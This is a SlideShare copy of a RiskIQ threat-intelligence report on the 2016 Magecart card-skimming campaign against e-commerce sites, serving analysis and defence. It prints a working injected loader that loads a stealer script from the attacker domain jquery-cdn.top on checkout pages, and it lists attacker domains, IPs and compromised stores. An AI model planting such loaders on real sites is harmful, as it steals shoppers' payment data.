SlideShare a Scribd company logo

Compromised e commerce_sites_lead_to_web-based_keyloggers

Andrey Apuhtin
Andrey Apuhtin

Compromised e commerce_sites_lead_to_web-based_keyloggers

Software
1 of 20
Download to read offline
RiskIQ Research: Compromised eCommerce Sites Lead to Web-Based Keyloggers Most methods used by attackers to target consumers are commonplace, such as phishing and the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend to be rarer and isolated to certain industries. However, some methods are downright obscure—a recently observed instance of threat actors injecting a keylogger directly into a website is one of these. Targeting Consumers Via Retailer Payment Platforms Since the widely publicized breach of Target Corporation, there has been a significant increase in awareness of activity surrounding POS (point of sale) system breaches. But web-based keylogger injection incidents continue to be little-known, even though they've been occurring for even longer than threats related to many high-profile breaches. In 2000, the discovery of a ​vulnerability​ in versions of the widely-deployed Cart32 software, which enables consumers to shop online, gave threat actors access to the application as the administrator so they could dump credit card data and run commands on the hosting server. In 2007, discussions like ​this​ in the OSCommerce community illustrated more instances. Later in 2011, ​analysis​ showed additional mass compromise activity in OSCommerce pushing online store visitors to information-stealing malware. Since then, this kind of activity increased, affecting other popular shopping cart software implementations. ● https://www.atwix.com/magento/credit-card-numbers-leak/ ● http://www.snapfast.com/blog/magento-mage-jpg-hack/ ● https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.ht ml ● https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html ● https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html 2016 Magecart injections In 2016, the trend continues. Numerous hacked eCommerce websites appear to be affected by a new compromise that injects JavaScript code into the site, which allows attackers to capture payment card information. RiskIQ has observed this campaign ranging back to at least March 2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects of the activity was ​shared​ in June by Sucuri.
RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes. Through analysis of data in ​RiskIQ Security Intelligence Services​ and RiskIQ’s ​PassiveTotal​, we’ve discovered that, although somewhat similar to other active credit card stealer operations, Magecart is significant for a few reasons. 1. Affected sites are hosted on multiple eCommerce platforms. At least the following technologies are explicitly seen to be impacted by this activity: ● Magento Commerce ● Powerfront CMS ● OpenCart 2. Multiple payment services provider linkages are targeted on affected sites as well, including: ● Braintree ● VeriSign payment processing 3. Formgrabber/credit card stealer content is hosted on remote attacker-operated sites, served over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS. 4. Attackers have refined their malicious content over time, with identified samples in RiskIQ data showing evidence of: ● Testing and capabilities development ● Increased scope of targeting payment platforms ● Development and testing of enhancements ● Addition of obfuscation to hinder analysis and identification ● Attempts to hide behind brands of commonplace web technologies to blend in on compromised sites 5. The credit card stealer works in a very similar manner on the compromised web server as a banking trojan functions on a compromised victim workstation. Code is injected which can “hook” web forms and access data form submissions much like a ​formgrabber​. Data is exfiltrated from the compromised server to a ​dropzone​ for attacker collection. There is also some indication in related payloads that attackers may be injecting bogus form fields into payment forms to solicit additional data from victims, similar to how ​webinjects​ operate when logged into a banking website from a compromised endpoint. Further insight​ on the functionality of the stealers observed in this campaign is available from ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this threat activity. An approximate timeline in observations from analyzed data provides the following insight:
1. March 2016: The domain ​statsdot.eu​ was registered, indicating possible early stages of the immediate Magecart campaign. Injections were simplistic and payloads were largely unobfuscated. 2. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of obfuscation. Unusual two-stage form of payload delivery observed (two domains used to serve injection to site visitors). The addition of conditional activation of stealer scripts by targeted cart URLs (checkout pages, etc.) were observed. 3. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to AS203624 DATAFLOWSU​, a ​recognized​ Eastern European “bulletproof hoster” (hosting and network services provider operated by and catering to cybercriminal interests). 4. September 2016: Additional obfuscated script injections and remotely hosted JS were observed. At this time, activity is reduced but steady. How Magecart Works With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page contents—including the Document Object Model (DOM), we can illustrate the operation of this campaign. The following sections present incidents on some affected websites. www.faber.co.uk In ​May 2016​, RiskIQ observed the website of ​Faber and Faber​, famed UK book publishing house, to be serving Magecart injections from their Magento site.
The injection in the source of the site can be seen with a simple addition of a ​script tag. When the injected web page on the merchant site is loaded, the malicious keylogger script is also loaded in the background. The keylogger script can access the browser session and submitted data.
In this case, the attacker delivers the malicious credit card stealer script in two stages: 1. The injected URL verifies that the page the site visitor is on is a checkout URL where cardholder data will be entered. In the delivered code, it is visible, for example, that the Firecheckout​ extension for Magento is targeted. 2. If the test succeeds, the stealer script is loaded from the second stage script URL: if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {document.write('<script src="https://jquery-cdn.top/mage.js"></script>')}; The resulting stealer script as served in this incident is shown below: The basic functionality of this script is to capture data from form fields and send the data to the remote URL using an AJAX call. Looking into the hosting for this attacker infrastructure, we see the following components active at the time: mageonline.net 108.61.188.71 jquery-cdn.top 45.32.153.108 45.32.153.108​ AS20473 | US | AS-CHOOPA - Choopa LLC 108.61.188.71​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant name and email): JQUERY-CDN.TOP​ 2016-05-09 PDR Ltd bitcoin-dns.hosting Ted 31338@mail.ru MAGEONLINE.NET​ 2016-05-16 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM bitcoin-dns.hosting Gregory braun.security@yandex.com Note The domain jquery-cdn.top may sound familiar to readers. In 2014 a threat actor group used the domain jquery-cdn.com in a series of attacks against web sites, injecting malicious redirects into them to hijack visitor traffic to push victims to an instance of a crimeware exploit kit. https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise- it-accounts-at-risk/ This was a different attack campaign with different goals but illustrates a common technique in website hijacking where domain names and similar indicators are chosen with careful intent to allow attacker modifications and network traffic to blend in and avoid suspicion by onlookers. The names of popular JavaScript libraries is a common choice because of their presence on so many websites. A listing of Magecart domains and sampling of URLs is presented at the end of this report to illustrate how this concept influenced this attacker’s choice of naming their infrastructure. A short time later in the month, RiskIQ observed the attack site serving slightly modified payloads:
We believe this modification indicates work in progress on developing and enhancing the attacker’s code. You can see that commented sections were added to the file referencing form fields related to ​Braintree’s​ Magento module. Braintree is a payment processing service that may be snapped into the Magento platform to facilitate payment handling. The addition of this code may be an indication of development and expansion of cardholder data targeting by the attacker. We also note that the bottom of the file also contains a call to console.log(), which aids the site visitor in debugging elements on the page. Verifying the victim eCommerce site, in this case, we note that the site indeed included Braintree-related JavaScript libraries. Opportunistic attackers may not always be able to predict the internals of how a compromised website handles details like payment processing and credit card handling. However, it's likely that upon access to multiple victim websites, threat actors realized they needed to add additional support for the variety of services used in the eCommerce space, leading to this on-the-fly development. www.everlast.com Later in May​, we identified that the main site of clothing/fitness powerhouse ​Everlast Worldwide, Inc.​ was compromised and abused to steal credit card data by the same threat actors.
As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer script used the filename ​everlast.js., which may indicate that the attackers recognized a major brand at their disposal and took additional steps to attempt to have their malicious code blend in with site contents. This customization of script names to match victim sites is not common across much of the analyzed activity.
Like that observed in ​other reported activity​, the stealer code served in this instance is delivered in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer and we note that it is used various capacities by multiple threat actors (observed in malicious website code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script library is shown below: Resolution and domain data in this occurrence: angular.club 108.61.211.216 108.61.211.216​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC ANGULAR.CLUB​ 2016-05-15 PDR Ltd. d/b/a PublicDomainRegistry.com bitcoin-dns.hosting Gregory braun.security@yandex.com shop.guess.net.au In ​July​, we observed another major fashion/lifecycle brand affected by the Magecart threat. The GUESS Australia​ online store was affected, and notably not implemented on Magento but rather ​Powerfront CMS​.
As shown, the attacker appears to have adapted the name of the stealer script ​(/mage-asp.js) to, in part, reflect the technology on the underlying site—Powerfront CMS is implemented in ASP. Stealer code:
Significant in this case is that sometime before staging this attack, hosting for the malicious stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat activity and ​noted​ to be a bulletproof hosting provider, servicing criminal customers on a dedicated basis. mage-js.link 80.87.205.143 80.87.205.143​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited MAGE-JS.LINK​ 2016-06-09 Gandi SAS gandi.net Farid Zeynalov abuse@dataflow.su www.rebeccaminkoff.com More recently, on ​September 19​, RiskIQ observed the Magento online store of fashion brand Rebecca Minkoff​ (apparel, handbags, more) affected by Magecart.
Stealer code: js-syst.su 80.87.205.145
80.87.205.145​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited JS-SYST.SU​ 2016-08-25 REGRU-REG-FID reg.ru - ​rudneva-y@mail.ua RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel category, believed to be in part because of the popularity of eCommerce in this space to extend storefronts to the Internet. Conclusion and Guidance As attackers focus on broadening capabilities to seize revenue opportunities, targets of cybercrime face an array of threats. eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. A bad experience at a retailer site may mean the loss of revenue as impacted users take their money elsewhere. Because Magecart affects websites deployed on commodity CMS and eCommerce software technology, the implementations of which may be outsourced by merchants to third parties, both merchants and integrators must take active roles in ensuring secure environments for deployed sites. Here is RiskIQ’s guidance: ● Merchants should partner with integrators and contractors who can be verified to provide assurances not only of minimum compliance requirements but can also demonstrate transparency around the technologies they utilize and their processes for hardening eCommerce installations and maintaining sound security postures. It is important that merchants do not leave assurance of this as an assumption! Consider specific contract language focused on these key elements together with SLAs. ● eCommerce site administrators must ensure familiarity and conformance to recommended security controls and best practices related to eCommerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also third-party plugins and related components. Examples of such resources for the Magento CMS include the following: ○ https://magento.com/security ○ https://magento.com/security/best-practices ● Site and system administrators should safeguard credentials used to access admin interfaces and underlying web hosting environments and passwords should be changed regularly. Strong authentication schemes should be utilized where available to reduce the risk from stolen credentials. Multi-factor authentication or two-step verification options are commonplace and effective for this. Use of cryptographic keys and
authentication tokens for access to remote hosting servers is recommended over traditional username and password logins. End users are also at significant risk as it is their payment data that is on the line when engaging in online sales. We recommend the following considerations for consumers: ● Carefully consider the online retailers whose sites you visit and to whom you submit payment data. Understand that at any given time, a portion of online retailers are compromised and present a risk that’s unknown to site owners. Without a high level of visibility and knowledge about attack techniques, it may be difficult to discern high-risk sites. Attempt to do business with merchants you believe are trustworthy and go to great lengths to protect customer data. ● Maintain secure configurations on all computers used to carry out online purchases. Any system used for online banking or eCommerce must be a known good or trusted endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual machines. Public systems and kiosks should be avoided! Operating system and all application security updates should be up to date. Other security controls may be utilized to address specific risks, such as antivirus software or other endpoint solutions. ● An effective control that can prevent attacks such as Magecart is the use of web content whitelisting plugins such as ​NoScript​ (for Mozilla’s ​Firefox​). These types of add-ons function by allowing the end user to specify which websites are “trusted” and prevents the execution of scripts and other high-risk web content. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.
Data and indicators You can download the indicator files​ ​here​ ​and​ ​here. Attacker Domains The following domains are observed serving malicious formgrabber code or are in some way closely related to observed domains (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. abuse-js.link angular.club cdn-js.link docstart.su govfree.pw jquery-cdn.top js-abuse.link js-abuse.su js-cdn.link js-link.su js-magic.link js-mod.su js-save.link js-save.su js-start.su js-stat.su js-sucuri.link js-syst.su js-top.link js-top.su jscript-cdn.com lolfree.pw mage-cdn.link mage-js.link mage-js.su magento-cdn.top mageonline.net mipss.su mod-js.su mod-sj.link sj-mod.link sj-syst.link
stat-sj.link statdd.su statsdot.eu stecker.su stek-js.link syst-sj.link top-sj.link truefree.pw Attacker IP addresses The following IP addresses are observed hosting formgrabber domains or are in some way closely related to observed addresses (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. These IPs are provided with associated routing AS data indicating likely provider of hosting or Internet service. 45.32.153.108​ AS20473 | US | AS-CHOOPA - Choopa LLC 46.151.52.238​ AS203050 | RU | INTESTELLAR - PE Radashevsky Sergiy Oleksandrovich 80.87.205.143​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 80.87.205.145​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 80.87.205.236​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 104.238.177.224​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 108.61.188.71​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 108.61.211.216​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 167.114.35.70​ AS16276 | FR | OVH - OVH Hosting Inc. 185.25.51.176​ AS61272 | LT | IST - Informacines Sistemos Ir Technologijos UAB 217.12.202.82​ AS59729 | BG | ITL - ITL Company 217.12.203.110​ AS59729 | BG | ITL - ITL Company Sample URLs The following data consists of a set of sample Magecart URLs observed injected into affected websites, sorted by an observed date of occurrence. statsdot.eu/mage.js # 2016-05-06 jquery-cdn.top/mage.js # 2016-05-22 jquery-cdn.top/tmp.js # 2016-05-31 mageonline.net/js/mage.js # 2016-05-27 angular.club/js/vanguardgear.js # 2016-05-29 angular.club/js/everlast.js # 2016-05-30 mage-js.link/mage-asp.js # 2016-07-12 cdn-js.link/cdn-js/mage.js # 2016-07-25 statsdot.eu/mag.js # 2016-08-14
sj-syst.link/sj-syst/ocart.js # 2016-08-16 js-save.link/js-save/mage.js # 2016-08-18 mage-cdn.link/cp/mage.js # 2016-08-18 mage-cdn.link/mage.js # 2016-08-21 mage-js.link/mage.js # 2016-09-04 jscript-cdn.com/mage.js # 2016-09-16 js-syst.su/mage-script.php # 2016-09-19 Affected websites The following data provides a list of affected websites observed to be serving script injections to known Magecart content hosting and data collection hosts over the observed timeframe. This information is extracted from RiskIQ crawl sequences and presented in the form of ​host pairs through PassiveTotal, our solution for investigators and responders exploring the Digital Footprints of malicious actors. aufdemkerbholz.de backstage.gs eyeglass.com farmwholesale.com fidelitystore.com giftshop.cancerresearchuk.org gkboptical.com gypsyville.com ihomecases.com kerbholz.com lenshareca.com mamapanda.com mauriziocollectionstore.com sasshoes.com saudi.miniexchange.com shop.air-care.com shop.guess.net.au shop2.gzanders.com shoppu.com.my storeinfinity.com truthbookpublishersstore.org valuedrugs.net www.5thavenuedog.com www.aalens.com www.agssalonequipment.com www.apacwines.com
www.arenaswimwearstore.com www.ariashop.co.uk www.arvaco.com www.aurigaeurope.com www.ausnaturalcare.com.au www.babysavings.com.au www.bellfieldclothing.com www.benmoss.com www.bogglingshop.com www.brandvapors.com www.brooktaverner.co.uk www.capstore.dk www.cbcrabcakes.com www.chefcentral.com www.clarke-distributing.com www.clickandgrill.de www.cottinfab.com www.countrywidehealthcare.co.uk www.crossingbroadstore.com www.dgpartsmall.com www.donnabeleza.com.br www.douglovesshirts.com www.eddymerckx.com www.emarket.com.kw www.evergreen.ie www.everlast.com www.faber.co.uk www.faberacademy.co.uk www.fidelitystore.com www.freedomflask.com www.ghurka.com www.gingerandsmart.com www.gkboptical.com www.golights.com.au www.grahamandgreen.co.uk www.greekpaddles.net www.huntingandfishing.co.nz www.iloveshowpo.com www.karity.com www.knetgolf.com www.kosherwine.com www.laploma.in www.leasevillenocredit.com
www.lions-pride.com www.littlelittleorganics.com www.lostgolfballs.com www.mackenzieltd.com www.mcs.com www.minervabeauty.com www.miniexchange.com www.mothercare.co.id www.musclefood.com www.musingapore.cn www.muzzle-loaders.com www.mylook.ee www.nationalcargocontrol.com www.nessaleebaby.com www.nichecycle.com www.onesolestore.com www.owgartenmoebel.de www.ozeparts.com.au www.paykobo.com www.personalizationuniverse.com www.punkstuff.com www.rebeccaminkoff.com www.reservewineclub.com.sg www.retaildeal.biz www.rosesonly.com.sg www.royaldiscount.com www.santonishoes.com www.savannahcollections.com www.shopboss.com.br www.showpo.com www.shrimpandgritskids.com www.skinsolutions.md www.slimminglabs.com www.smoothmag.com www.sophieparis.com www.stagespot.com www.storeinfinity.com www.superbikestore.in www.surthrival.com www.thebeautyplace.com www.titanssports.com.br www.todaycomponents.com www.tonnotermans.nl
www.ukbathroomstore.co.uk www.umnitza.com www.voicerecognition.com.au www.waterfilters.net www.wesellusedsound.co.za www.windsorsmith.com.au www.zalacliphairextensions.com.au

Recommended

Script based malware detection in online banking
Script based malware detection in online bankingScript based malware detection in online banking
Script based malware detection in online bankingJakub Kałużny
 
9 3
9 39 3
9 3Hai Nguyen
 
Lecture #24 : Cross Site Request Forgery (CSRF)
Lecture #24 : Cross Site Request Forgery (CSRF)Lecture #24 : Cross Site Request Forgery (CSRF)
Lecture #24 : Cross Site Request Forgery (CSRF)Dr. Ramchandra Mangrulkar
 
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)Kate Dalakova
 
Weak Links: Cyber Attacks in the News & How to Protect Your Assets
Weak Links: Cyber Attacks in the News & How to Protect Your AssetsWeak Links: Cyber Attacks in the News & How to Protect Your Assets
Weak Links: Cyber Attacks in the News & How to Protect Your AssetsOilPriceInformationService
 
Www usenix-org
Www usenix-orgWww usenix-org
Www usenix-orgOuzza Brahim
 
Ransomware-as-a-Service: The business of distributing cyber attacks
Ransomware-as-a-Service: The business of distributing cyber attacksRansomware-as-a-Service: The business of distributing cyber attacks
Ransomware-as-a-Service: The business of distributing cyber attacksΔρ. Γιώργος K. Κασάπης
 
QOMPLX Cyber Identity Access Management
QOMPLX Cyber Identity Access Management QOMPLX Cyber Identity Access Management
QOMPLX Cyber Identity Access Management Chad Leschefsky
 

Recommended

Script based malware detection in online banking
Script based malware detection in online bankingScript based malware detection in online banking
Script based malware detection in online bankingJakub Kałużny
 
9 3
9 39 3
9 3Hai Nguyen
 
Lecture #24 : Cross Site Request Forgery (CSRF)
Lecture #24 : Cross Site Request Forgery (CSRF)Lecture #24 : Cross Site Request Forgery (CSRF)
Lecture #24 : Cross Site Request Forgery (CSRF)Dr. Ramchandra Mangrulkar
 
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)
2019 06-05-dalakova-kateryna-mkm-mmt-pov-assignment (1)Kate Dalakova
 
Weak Links: Cyber Attacks in the News & How to Protect Your Assets
Weak Links: Cyber Attacks in the News & How to Protect Your AssetsWeak Links: Cyber Attacks in the News & How to Protect Your Assets
Weak Links: Cyber Attacks in the News & How to Protect Your AssetsOilPriceInformationService
 
Www usenix-org
Www usenix-orgWww usenix-org
Www usenix-orgOuzza Brahim
 
Ransomware-as-a-Service: The business of distributing cyber attacks
Ransomware-as-a-Service: The business of distributing cyber attacksRansomware-as-a-Service: The business of distributing cyber attacks
Ransomware-as-a-Service: The business of distributing cyber attacksΔρ. Γιώργος K. Κασάπης
 
QOMPLX Cyber Identity Access Management
QOMPLX Cyber Identity Access Management QOMPLX Cyber Identity Access Management
QOMPLX Cyber Identity Access Management Chad Leschefsky
 
Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.Senad Aruc
 
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...IOSR Journals
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESAM Publications,India
 
Big data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insuranceBig data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insuranceSyed Danish Ali
 
Amazon & E Bay
Amazon & E BayAmazon & E Bay
Amazon & E BaySabyasachi Dasgupta
 
Case study on JP Morgan Chase & Co
Case study on JP Morgan Chase & CoCase study on JP Morgan Chase & Co
Case study on JP Morgan Chase & CoVictor Oluwajuwon Badejo
 
ThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted EganThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted EganKen Lam
 
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-ThreatsThe Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats- Mark - Fullbright
 
Zsun
ZsunZsun
ZsunHai Nguyen
 
Cybercriminals target online banking
Cybercriminals target online bankingCybercriminals target online banking
Cybercriminals target online bankingScientia Groups
 
a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016Eli Marcus
 
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...Ken Lam
 
Jon handout 3
Jon handout 3Jon handout 3
Jon handout 3Cheryl White
 
Jon handout 2
Jon handout 2Jon handout 2
Jon handout 2Cheryl White
 
Cookie surveillance
Cookie surveillanceCookie surveillance
Cookie surveillanceGreg Sterling
 
Panda Security - The Hotel Hijackers
Panda Security - The Hotel HijackersPanda Security - The Hotel Hijackers
Panda Security - The Hotel HijackersPanda Security
 
Iy2515891593
Iy2515891593Iy2515891593
Iy2515891593IJERA Editor
 
ThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network PresentationThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network PresentationThreatMetrix
 
Detecting Phishing using Machine Learning
Detecting Phishing using Machine LearningDetecting Phishing using Machine Learning
Detecting Phishing using Machine Learningijtsrd
 
Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?NormShield
 
Vincent Eku Resume
Vincent Eku ResumeVincent Eku Resume
Vincent Eku ResumeVincent Eku
 
Informe de gestion daniela gutierrez
Informe de gestion daniela gutierrezInforme de gestion daniela gutierrez
Informe de gestion daniela gutierrezARNULFO HIGUITA
 

More Related Content

What's hot

Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.Senad Aruc
 
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...IOSR Journals
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESAM Publications,India
 
Big data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insuranceBig data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insuranceSyed Danish Ali
 
ThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted EganThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted EganKen Lam
 
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-ThreatsThe Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats- Mark - Fullbright
 
Cybercriminals target online banking
Cybercriminals target online bankingCybercriminals target online banking
Cybercriminals target online bankingScientia Groups
 
a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016Eli Marcus
 
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...Ken Lam
 
Panda Security - The Hotel Hijackers
Panda Security - The Hotel HijackersPanda Security - The Hotel Hijackers
Panda Security - The Hotel HijackersPanda Security
 
ThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network PresentationThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network PresentationThreatMetrix
 
Detecting Phishing using Machine Learning
Detecting Phishing using Machine LearningDetecting Phishing using Machine Learning
Detecting Phishing using Machine Learningijtsrd
 
Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?NormShield
 

What's hot (20)

Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.Kins origin malware with unique ATSEngine.
Kins origin malware with unique ATSEngine.
 
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
Pattern Mapping Approach for Detecting Xss Attacks In Multi-Tier Web Applicat...
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
 
Big data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insuranceBig data analytical driven fraud detection for finance; banks and insurance
Big data analytical driven fraud detection for finance; banks and insurance
 
Amazon & E Bay
Amazon & E BayAmazon & E Bay
Amazon & E Bay
 
Case study on JP Morgan Chase & Co
Case study on JP Morgan Chase & CoCase study on JP Morgan Chase & Co
Case study on JP Morgan Chase & Co
 
ThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted EganThreatMetrix ARRC 2016 presentation by Ted Egan
ThreatMetrix ARRC 2016 presentation by Ted Egan
 
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-ThreatsThe Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
The Murky Waters of the Internet: Anatomy of Malvertising and Other e-Threats
 
Zsun
ZsunZsun
Zsun
 
Cybercriminals target online banking
Cybercriminals target online bankingCybercriminals target online banking
Cybercriminals target online banking
 
a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016a-decade-of-phishing-wp-11-2016
a-decade-of-phishing-wp-11-2016
 
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
ThreatMetrix Minimizes Payment Fraud Reduce Fraud and Protect Revenue Without...
 
Jon handout 3
Jon handout 3Jon handout 3
Jon handout 3
 
Jon handout 2
Jon handout 2Jon handout 2
Jon handout 2
 
Cookie surveillance
Cookie surveillanceCookie surveillance
Cookie surveillance
 
Panda Security - The Hotel Hijackers
Panda Security - The Hotel HijackersPanda Security - The Hotel Hijackers
Panda Security - The Hotel Hijackers
 
Iy2515891593
Iy2515891593Iy2515891593
Iy2515891593
 
ThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network PresentationThreatMetrix Fraud Network Presentation
ThreatMetrix Fraud Network Presentation
 
Detecting Phishing using Machine Learning
Detecting Phishing using Machine LearningDetecting Phishing using Machine Learning
Detecting Phishing using Machine Learning
 
Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?
 

Viewers also liked

Vincent Eku Resume
Vincent Eku ResumeVincent Eku Resume
Vincent Eku ResumeVincent Eku
 
Informe de gestion daniela gutierrez
Informe de gestion daniela gutierrezInforme de gestion daniela gutierrez
Informe de gestion daniela gutierrezARNULFO HIGUITA
 
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...
Il Mobbing Secondario e gli effetti sulla prole in età evolutiva - Tesi di La...Drughe .it
 
Raimondo Villano - Vasi di farmacia (1a parte)
